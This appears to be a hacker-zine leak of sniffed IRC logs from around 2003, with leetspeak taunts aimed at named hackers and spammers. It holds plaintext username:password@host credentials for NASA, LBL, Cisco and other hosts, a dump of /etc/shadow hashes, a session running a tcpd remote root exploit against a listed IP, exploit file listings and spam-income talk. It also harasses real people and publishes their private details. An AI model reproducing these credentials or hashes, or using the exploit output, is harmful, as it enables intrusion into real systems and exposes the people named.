[SEND_MSG] [09:27pm] - kas but wif some1 else [SEND_MSG] [09:27pm] - #webdesign i have nothing to prove .. no reason to lie [SEND_MSG] [09:27pm] - #webdesign i just talk facts [SEND_MSG] [09:28pm] - #webdesign oh lord.... R3M3MB3R TH1S "i just talk facts" [SEND_MSG] [12:13am] - #webdesign ever herad of a crew called teso ? [SEND_MSG] [12:15am] - #webdesign www.team-teso.net we release useful tolls W3? BUHAHAHAHA. L1K3 Y0U C4N FUQN C0D3. [MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au [MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au still not working [SEND_MSG] [11:31pm] - kerr hrmm add password="skyline1" [SEND_MSG] [11:39pm] - kerr hrmm [SEND_MSG] [11:39pm] - kerr leme try something L3T M3 TRY SN1FF1NG Y0UR P4ZZW0RDZ. H4R H4R H4R [SEND_MSG] [12:02pm] - #web-design hrmm found a bug in the linux kernel [SEND_MSG] [12:02pm] - #web-design buffer overflow [SEND_MSG] [12:02pm] - #web-design looks like if you get yourself in enough groups [SEND_MSG] [12:02pm] - #web-design you can overflow the task_state() by doing a cat /proc/$$/status [SEND_MSG] [12:02pm] - #web-design for (g = 0; g < p->ngroups; g++) [SEND_MSG] [12:02pm] - #web-design buffer += sprintf(buffer, "%d ", p->groups[g]); [SEND_MSG] [12:02pm] - #web-design I cant find the size of the buffer however [SEND_MSG] [12:02pm] - #web-design but it looks like it passes thru alot of functions with no bounds checking. MUZT B3 A BUG.. R U SUR3 Y0U 4RNT L34K1NG S1LV10'Z R3S34RCH?? [SEND_MSG] [11:59pm] - jeeves but it takes time to build up the experience [SEND_MSG] [11:59pm] - jeeves to learn the tricks [SEND_MSG] [11:59pm] - jeeves to make the money [SEND_MSG] [11:59pm] - jeeves cos if u go spamming people [SEND_MSG] [11:59pm] - jeeves if u dont know what ur doing [SEND_MSG] [11:59pm] - jeeves u will be shut down [TimeStamp Tue Mar 18 00:00:00 2003] [TimeStamp Tue Mar 18 00:00:00 2003] [SEND_MSG] [12:00am] - jeeves within a day [SEND_MSG] [12:00am] - jeeves but if u do know whats going on [SEND_MSG] [12:00am] - jeeves usd$5k a week easy [SEND_MSG] [12:05am] - jeeves i can vouch for that sorta money too C4RL SP4MZ. [SEND_MSG] [09:38pm] - #kas all u need is 1 tcp port [SEND_MSG] [09:38pm] - #kas all i need [SEND_MSG] [09:38pm] - #kas nearly done [SEND_MSG] [09:38pm] - #kas sec [SEND_MSG] [09:39pm] - #kas root@main:~/.s/enc# ./7350paom [SEND_MSG] [09:39pm] - #kas Tcpd Remote exploit for Linux 2.2.*, 2.4.* 09/10/02 [SEND_MSG] [09:39pm] - #kas by jduck, thanks to xor, zip, scut and ronin. [SEND_MSG] [09:39pm] - #kas Enter Password: [SEND_MSG] [09:39pm] - #kas ************** [SEND_MSG] [09:39pm] - #kas Using Offset: 0x08fc3e [SEND_MSG] [09:39pm] - #kas EIP: 0x08fdd0c [SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0a ... failed [SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0b ... failed [SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0c ... verified [SEND_MSG] [09:39pm] - #kas ** Lets see what we can bind(); ** [SEND_MSG] [09:39pm] - #kas Exploiting Host: 203.173.160.36....(OK) [SEND_MSG] [09:39pm] - #kas Binding shell on port 7350 [SEND_MSG] [09:39pm] - #kas > id [SEND_MSG] [09:39pm] - #kas uid=0(root) gid=0(root) groups=0(root),1(bin) [SEND_MSG] [09:39pm] - #kas bingo! [MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au fuk [MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au GIBME! [MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au LOL [SEND_MSG] [09:40pm] - #kas 1 sec.. checking out stuff [SEND_MSG] [09:43pm] - #kas hrmm he ran iptables before i could run it on that port [SEND_MSG] [09:43pm] - #kas take down that firewall again [SEND_MSG] [09:44pm] - #kas h$ ls [SEND_MSG] [09:44pm] - #kas 7350reass.tar.gz holygrail.c napalm openssl-fuck.c rsx.c t vmware.zip [SEND_MSG] [09:44pm] - #kas 840.bind9.c hpkit0.2.tar.gz napalm2.c openssl-too-open-Hool.c snifft.c tank2.c [SEND_MSG] [09:44pm] - #kas bindtty.c hpux-ftp.c nlock.c p24.bin sqlfuck.tgz telnetd.c [SEND_MSG] [09:44pm] - #kas frassl.c nainject.c openssl-fuck-new.c rdevx.c sxp.bin tsao.tar [SEND_MSG] [09:44pm] - #kas $ ./7350reass [SEND_MSG] [09:44pm] - #kas 7350reass - OpenBSD/FreeBSD/NetBSD remote kernel exploit [SEND_MSG] [09:44pm] - #kas fragment reassembly numeric overflow + logic fuckup [SEND_MSG] [09:44pm] - #kas -s & -l (21/04) [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas inferior exploits for this bug rely on 3 values.. we [SEND_MSG] [09:44pm] - #kas only need the ip_reass delta, but still, patience [SEND_MSG] [09:44pm] - #kas is required to find this.. this shouldn't be a [SEND_MSG] [09:44pm] - #kas problem.. you don't need root to run this, as [SEND_MSG] [09:44pm] - #kas everything can be crafted via setsockopt.. [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas mhhh, should get you in.. < 5 minutes.. [SEND_MSG] [09:44pm] - #kas no guarantees though.. [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas OpenBSD developers are weenies ;) [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas TESO: 2^32-1 SecurityFocus: 2>>2 [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas [SEND_MSG] [09:44pm] - #kas password: [SEND_MSG] [09:44pm] - #kas $ head -30 openssl-fuck-new.c [SEND_MSG] [09:44pm] - #kas /* [SEND_MSG] [09:44pm] - #kas * openssl-too-open.c - OpenSSL remote apache exploit [SEND_MSG] [09:44pm] - #kas * [SEND_MSG] [09:44pm] - #kas * by Solar Eclipse [SEND_MSG] [09:44pm] - #kas * [SEND_MSG] [09:44pm] - #kas * Compile with: gcc -o openssl-too-open openssl-too-open.c -lcrypto [SEND_MSG] [09:44pm] - #kas * [SEND_MSG] [09:44pm] - #kas * Private 0dd code. -keep it so divineint :) [SEND_MSG] [09:44pm] - #kas * [SEND_MSG] [09:44pm] - #kas * this kode has one extra target for redhat 7.2 / apache 1.3.22-6 [SEND_MSG] [09:44pm] - #kas * [SEND_MSG] [09:44pm] - #kas */ [SEND_MSG] [09:44pm] - #kas ya [SEND_MSG] [09:44pm] - #kas ok [SEND_MSG] [09:44pm] - #kas how about [SEND_MSG] [09:44pm] - #kas i show u something [SEND_MSG] [09:45pm] - #kas 1 sec [SEND_MSG] [09:45pm] - #kas <-- actually researches his own code [SEND_MSG] [09:46pm] - tom kas.net.au/OpenSSH_3.5p1.txt [SEND_MSG] [09:46pm] - tom want the exploit for that ? [SEND_MSG] [09:46pm] - drewgon kas.net.au/OpenSSH_3.5p1.txt [SEND_MSG] [09:46pm] - drewgon want the exploit for that ? [SEND_MSG] [09:46pm] - drewgon hehe [MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au yep [MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au mm [MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au i want openssl root. [MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au lol [NOTICES ] [09:46pm] - tom no thanks :P [SEND_MSG] [09:47pm] - tom take a look down the bottom [NOTICES ] [09:48pm] - tom so? [SEND_MSG] [09:48pm] - tom not just a script kiddie from packet storm [NOTICES ] [09:48pm] - tom err [NOTICES ] [09:49pm] - tom i dont see the relevance mate :) [NOTICES ] [09:49pm] - tom im not assuming youre a script kiddie GR34T3ZT L0G 3V3R. D0NT Y0U D4R3 L34K THE REM0T3 *BSD K3RN3L 0D4Y!!!! TH1Z MUZT B3 WHY Y0U H4V3 T0 C4RD 4LL Y0UR SH3LL 4CC0UNTZ 0N FBSD B0X3Z & RUN IOSMASH, R1GHT?? [SEND_MSG] [05:28pm] - darkacid` i fill sorry for people like cam [SEND_MSG] [05:28pm] - darkacid` so, cam is our leak? [SEND_MSG] [05:28pm] - darkacid` is he? [MSGS ] [05:28pm] - darkacid` marijuana@1.800.p1mpdaddy.com LOL [MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com should i say know cam is not our leak? [SEND_MSG] [05:29pm] - darkacid` dont say anything [MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com ok [SEND_MSG] [05:29pm] - darkacid` they know something is leaking though [SEND_MSG] [05:29pm] - darkacid` dont proveke the subject [MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com yeh [MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com kk [MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com they think icer is sniffing em [MSGS ] [05:30pm] - darkacid` marijuana@1.800.p1mpdaddy.com are those root's ssh ? [MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com petermc:wyei$7@petermc.lbl.gov [MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com works [MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;PP [MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com lol [MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com god man [MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com inever know you knew shit like this [MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;P [SEND_MSG] [05:32pm] - darkacid` as i said [SEND_MSG] [05:32pm] - darkacid` i know more than i lead on to know [SEND_MSG] [05:32pm] - darkacid` dont mess with me BULLSH1T. H0NO W1LL FUQN H4Q Y0U 4G41N Y0U SP4MM1NG B1TCH! Y0U H4V3 N0 FUQN S3CUR1TY. Y0U 4R3 FUQN SCUM. G0 C4RD S0M3M0R3 SH3LLZ S0 Y0U C4N H4CK Y0U FUQN N0 T4L3NT P13C3 0F D0GSH1T. [SEND_MSG] [11:38am] - harq . [NOTICES ] [11:38am] - harq DCC Send fahrenheit.tgz (81.86.236.41) [MSGS ] [11:38am] - harq harq@dope.illhiphop.org <3 drag'n'drop HARQ <3 SP4M. HARQ <3 T0 G3T 0WN3D T00? [MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 dood [MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 pd@race4:/eggdrop/scripts$ ssh eu.kas.net.au -lthebug [MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 thats in my history [MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 on my shell H0NO FUQZ UP!!! [MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 81.91.65.208 [MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 is the ip [MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 they used to connect [MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 .fr ip [MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 fuck me [MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 just found another box with it [MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 \; [MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 from your box [MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 yesterday [MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 i know that wasnt me [NOTICES ] [07:20am] - fearsom plz notice the topic as site is down atm PLZ N0T1C3 Y0UR B0X3Z W3R3 RM'D 3Y3'LL S4V3 Y0U TH3 3MB4R4ZZM3NT C4RL.. & 0NLY P0ST TH3Z3 2 SH4D0WZ F0R N0W. (W3 R JUZT T00 L4ZY T0 G0 THR0UGH TH3 QU4RT3R G1G 0F H4QL0GZ W3 G0T 0N Y0U). eu.kas.net.au root:$1$ujo0InKC$a6nh4tysOkTN6Ft2GfaVV.:12740:0:99999:7::: carl:$1$ZWEqzaIw$7nW/k9Evso9V1ZOD8DodK1:12732:0:99999:7::: cactiuser:$1$qvCBjir9$DNW2HGjb/WnqHGhZ/2Vty1:12733:0:99999:7::: pd:$1$LkLGEb6t$JFjab9MxSUq0ANtFUguVY0:12759:0:99999:7::: thebug:$1$C6iAxjB7$3up7FymevwxI0MVZmUL23.:12744:0:99999:7::: hellman:$1$x58ZXTf0$MoUdNZRWqH7M9XLuKMuvZ.:12744:0:99999:7::: jizonu:$1$3w6k0JV1$71O0YT89s3dw.nkc7vMYK1:12745:0:99999:7::: dns:$1$iSUa3Kf/$tL4ODD03JnLh68sgv.LRi/:12768:0:99999:7::: kas07.kas.net.au root:$1$72ATKfWX$fwi7MA8.DViY9r6Nxugrd0:12493:0:99999:7::: hellman:$1$u/UKeSgu$1vqSVsW/mxhJTCskiAU8g1:12493:0:99999:7::: pd:$1$pXIVIeEp$l0YLB/xrvmhkJZCKo9AW//:12736:0:99999:7::: f:$1$2c71DTUx$0yfpCbGFq1Yb539LzS2X8.:12499:0:99999:7::: bob:$1$qlqICTTj$iIwWYyS1.8yenY.UHbXUj1:12574:0:99999:7::: harq:$1$9onG2xj8$8QboUVUAKFE.wFuapjHso/:12607:0:99999:7::: dark:$1$SH7H8OtF$Uu9Hr5vNoj2F8rDq/6S0/0:12690:0:99999:7::: silvio, harq, bobdash, the_bug, pd... th1z tru3ly 1z a h4q3r h43v3n! 3nt3r th3 l34gu3 0f th3 .au sp4mm3rz! 19.txt -~-~-~ ptp un3th1c4l h4ck1ng TH1Z 1Z FR0M TH3 H3LLM4N CH4TL0GZ.. 1T SH0ULD G0 1N TH0Z3, BUT W3 SUQ @ M4K1NG 4 ZIN3. M0R3 CH4TL0GZ, C4UZ3 3V3R0N3 L1K3Z T0 R34D TH3M S0 FUQ1NG MUCH... & ALL H0NO KN0WZ H0W T0 D0 1Z SN1FF IRC TR4FF1C. M4YB3 N3XT Y34R W3 W1LL G3T S0M3 M0R3 0D4YZ. [MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i simply dont have the connections or money i need to do business shit [MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i pretty much gave up on trying [SEND_MSG] [10:42pm] - arcanum what about applying for a job ? [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com now i'm just sitting here waiting to goto jail or die [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea i've been looking for work [SEND_MSG] [10:43pm] - arcanum any work ? or just selective work ? [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com had a few interviews that "looked promising" [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com but ended up just flopping [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com no work at all [SEND_MSG] [10:43pm] - arcanum maybe you need to compromise in the sorts of work you are applying for ? [MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea [SEND_MSG] [10:43pm] - arcanum while you have a shit job [MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i guess i could go work a burger king or mc donalds [SEND_MSG] [10:44pm] - arcanum that pays something (something > nothing) [SEND_MSG] [10:44pm] - arcanum you can still apply for something better [SEND_MSG] [10:44pm] - arcanum in the mean time [SEND_MSG] [10:44pm] - arcanum while you work a shit job [SEND_MSG] [10:44pm] - arcanum and if you get a better job [SEND_MSG] [10:44pm] - arcanum then you can quit the shit job easy as pie [SEND_MSG] [10:44pm] - arcanum makes sense.. [SEND_MSG] [10:44pm] - arcanum then you'll have more $ than you currently have [MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com shrug [MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i pretty much lost all motivation [SEND_MSG] [10:44pm] - arcanum you'll have something to keep your mind busy on other than irc [MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com to do anything [MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com heh [SEND_MSG] [10:44pm] - arcanum which kinda degrades the mind for motivation on other shit and what not [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i rarely irc [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh [SEND_MSG] [10:45pm] - arcanum would you rather work at say burger king making $x/hr or making wargame servers for people you dont know ? [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i just idle on irc [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i'm usually doing other things [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com programming little, reverse engineering, playing games, watching movies [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com just [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com nothing PRODUCTIVE [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i miss being productive [MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh [SEND_MSG] [10:46pm] - arcanum whos court is the ball in ? [MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com what do you mean? [MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i feel like i lost control [MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com heh [MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i dont have any control over my future [SEND_MSG] [10:46pm] - arcanum is the glass 1/2 full or 1/2 empty \; [MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com havent had control for 3 years [SEND_MSG] [10:47pm] - arcanum how long do you have to wait to find out what the story is ? [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i dont know [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com supposably [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com this next court date [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com is final one [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com april 12th [SEND_MSG] [10:47pm] - arcanum ahh [SEND_MSG] [10:47pm] - arcanum hrmm [SEND_MSG] [10:47pm] - arcanum what do you think the likely outcome will be ? [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i'll goto federal prison for 6 months to a year [MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com which isnt bad [MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com compared to the 20 years i should be doing [MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com not to mention the boatload of relevant conduct [MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com i'll prolly end up having to pay 80k-100k in restitution [MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com over the course of the rest of my life [SEND_MSG] [10:48pm] - arcanum thats not 'that' much [SEND_MSG] [10:49pm] - arcanum what happens after that 6months-year ? [SEND_MSG] [10:49pm] - arcanum you free to do what you want ? [MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com no [MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com i'm on probation for another 5 years after that [SEND_MSG] [10:50pm] - arcanum like no computers probation or just dont get in trouble again probation ? [MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com not sure [MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com but i'm pretty sure [MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com the judge will let me use computers [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com this sucks so bad still [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com even after 3 years [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com heh [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com dont know where people like PD get off thinking my life is just the same as before [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com where i have a job and everything [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com ... [MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com not even close to the truth [SEND_MSG] [10:53pm] - arcanum ya [SEND_MSG] [10:53pm] - arcanum hrmm [SEND_MSG] [10:53pm] - arcanum maybe its time to find a new hobby [SEND_MSG] [10:53pm] - arcanum away from the pc ? [MSGS ] [10:54pm] - arcanum arc@mall.pulltheplug.com yea maybe i should take up gardening [SEND_MSG] [10:54pm] - arcanum plenty of other things out there [SEND_MSG] [10:55pm] - arcanum maybe find something new [SEND_MSG] [10:55pm] - arcanum that will motivate you again [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com honestly i odnt know wtf i'm going to do [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com hopefully things will be ore clear when i get sentenced [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com i'll be able to say [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "ok 6 years and i'll be free again" [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com =\ [MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "6 years and i'll be able to do xyz again" [SEND_MSG] [10:56pm] - arcanum 6 years is a long time [SEND_MSG] [10:56pm] - arcanum do you want to be back where you started in 6 years time ? [SEND_MSG] [10:56pm] - arcanum probably not.. [SEND_MSG] [10:56pm] - arcanum maybe if you do go in for 6 months [MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i wont have a choice [MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com well [SEND_MSG] [10:56pm] - arcanum use htat time to un-addict your self [MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i figure [MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com 6 months [SEND_MSG] [10:56pm] - arcanum then you cna start fresh [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com when i get out [SEND_MSG] [10:57pm] - arcanum with ideas [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com for another 6 months i'll be still controlled [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com after that [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com things will be lax enough for me to be able to do what i want [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com again [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i'm not really addicted [SEND_MSG] [10:57pm] - arcanum find a woman [SEND_MSG] [10:57pm] - arcanum theres a start [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i just have simply nothing else to do with my time [MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com wish it was that easy [SEND_MSG] [10:58pm] - arcanum well wait the 6 months then before you start looking im guessing heh [MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com lol [MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com i'm going to be 23 [MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com this november [MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com 23 and i have nothing to show for myself [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no car [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no money [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no job [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com if my mom told me [SEND_MSG] [10:59pm] - arcanum you need to stop thinking about everyone else [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com "get the fuck out of my house" [SEND_MSG] [10:59pm] - arcanum and think about yourself [MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com i'd own nothing TH1Z 1Z 0UR G1FT T0 MRX F0R H1Z N3XT B00K. [SEND_MSG] [11:58am] - #vortex ssh -l root james.kalifornia.com [SEND_MSG] [11:58am] - #vortex /lib/ [SEND_MSG] [11:59am] - #vortex or /usr/lib [SEND_MSG] [11:59am] - #vortex one of the 2 [SEND_MSG] [11:59am] - #vortex dude [SEND_MSG] [11:59am] - #vortex i know a lot more [SEND_MSG] [11:59am] - #vortex than people give me credit for [SEND_MSG] [11:59am] - #vortex i just dont go and talk shit [SEND_MSG] [11:59am] - #vortex like msot [SEND_MSG] [12:00pm] - #vortex root@ns.linux.com's password: Huntington [SEND_MSG] [12:00pm] - #vortex shrug [SEND_MSG] [12:04pm] - #vortex jessi:netPo90Afrika$n@q.arc.nasa.gov [SEND_MSG] [12:04pm] - #vortex raquele:netPo90Afrika$n@q.arc.nasa.gov [SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov [SEND_MSG] [12:04pm] - #vortex raquele:netPo99Afrika$n@q.arc.nasa.gov [SEND_MSG] [12:04pm] - #vortex gobridge:2Sxnv470@shell3.ba.best.com [SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov [SEND_MSG] [12:04pm] - #vortex shrug [SEND_MSG] [12:04pm] - #vortex want intel.com ? [SEND_MSG] [12:04pm] - #vortex microsoft.com [SEND_MSG] [12:04pm] - #vortex you name it [SEND_MSG] [12:04pm] - #vortex come 1999 [SEND_MSG] [12:04pm] - #vortex i had most shit [SEND_MSG] [12:04pm] - #vortex around [SEND_MSG] [12:04pm] - #vortex unlike most people tho [SEND_MSG] [12:04pm] - #vortex i kept to my self [SEND_MSG] [12:05pm] - #vortex and didnt past shit like that [SEND_MSG] [12:05pm] - #vortex in chans [SEND_MSG] [12:05pm] - #vortex and ge fucked up [SEND_MSG] [12:05pm] - #vortex get* [SEND_MSG] [12:05pm] - #vortex i played dumb [SEND_MSG] [12:05pm] - #vortex shrug [SEND_MSG] [12:05pm] - #vortex 2 secs [SEND_MSG] [12:07pm] - #vortex lol [SEND_MSG] [12:08pm] - #vortex but the book is going to take a while to write [SEND_MSG] [12:08pm] - #vortex he might be done by then [SEND_MSG] [12:08pm] - #vortex remember this xt ? [SEND_MSG] [12:08pm] - #vortex username = likwid9 [SEND_MSG] [12:08pm] - #vortex passwd = jedl8CP [SEND_MSG] [12:08pm] - #vortex Compaq's Tru64 Unix 4.0d (JAVA) AS1200 2@533MHz (ev56) telnet to [SEND_MSG] [12:08pm] - #vortex 192.233.54.145 [SEND_MSG] [12:08pm] - #vortex Debian 2.1 Linux on Intel Proliant 4@200MHz telnet to 192. [SEND_MSG] [12:08pm] - #vortex 233.54.143 [SEND_MSG] [12:08pm] - #vortex Redhat 6.2 Linux on Alpha DS20 2@500MHz (ev6) telnet to 192. [SEND_MSG] [12:08pm] - #vortex ... etc [SEND_MSG] [12:09pm] - #vortex xt got owned ?! S0 D1D Y0U, Y0U DUMB FUQN CUNT. H3LLM4N + XT = B1GG3ZT M0UTHZ 1N H4Q1NG. "WANT ROOT ON FNORD.IO.COM?" XT - 2006 1Z TH4T TH3 0NLY B0X Y0U FUQN L4M3RZ H4V3 3V3R R00T3D??? [MSGS ] [03:47pm] - arcanum arc@mall.pulltheplug.com stupid politics [SEND_MSG] [03:48pm] - arcanum what provoked it ? [SEND_MSG] [03:49pm] - arcanum just cos i hate you arc [SEND_MSG] [03:49pm] - arcanum doesnt mean i hate the network [SEND_MSG] [03:49pm] - arcanum someting between u and josh i take it [MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com so irritating [MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com yea [MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com he's mad i pretty much run ptp [MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com so he provoked a fight [MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com riled up a bunch of people PLZ H4Q ARC4NUM. [SEND_MSG] [05:46pm] - arcanum mel:Pearljam@shell.one.net [SEND_MSG] [05:47pm] - arcanum queerskin:guinness@queernet.org [SEND_MSG] [05:47pm] - arcanum zillah:treakle732@feeding.frenzy.com [SEND_MSG] [05:47pm] - arcanum raquele:netPo99Afrika$n@q.arc.nasa.gov [SEND_MSG] [05:47pm] - arcanum gobridge:2Sxnv470@shell3.ba.best.com [SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov [SEND_MSG] [05:47pm] - arcanum gobridge:u!V3zU7i@shell3.ba.best.com [SEND_MSG] [05:47pm] - arcanum mel:Pearljam@shell.one.net [SEND_MSG] [05:47pm] - arcanum jessi:netPo90Afrika$n@q.arc.nasa.gov [SEND_MSG] [05:47pm] - arcanum raquele:netPo90Afrika$n@q.arc.nasa.gov [SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov [SEND_MSG] [05:47pm] - arcanum [SEND_MSG] [05:47pm] - arcanum [SEND_MSG] [05:47pm] - arcanum they be all ssh sniff logs from fnord.io [MSGS ] [06:01pm] - arcanum arc@mall.pulltheplug.com yea that's eris [SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman sv@smoke.dope.org's password: : sm00ti3 [SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman queerskin@queernet.org's password: : AbuNuwas [SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman jdunson@miyu.cc.vt.edu's password: : Vamp4C0w [SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io [SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman heh [MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com dope.org [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [06:02pm] - arcanum mdfranz@ssh.cisco.com's password: : l1nxrl2999 [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [06:02pm] - arcanum h0 h0 [MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com 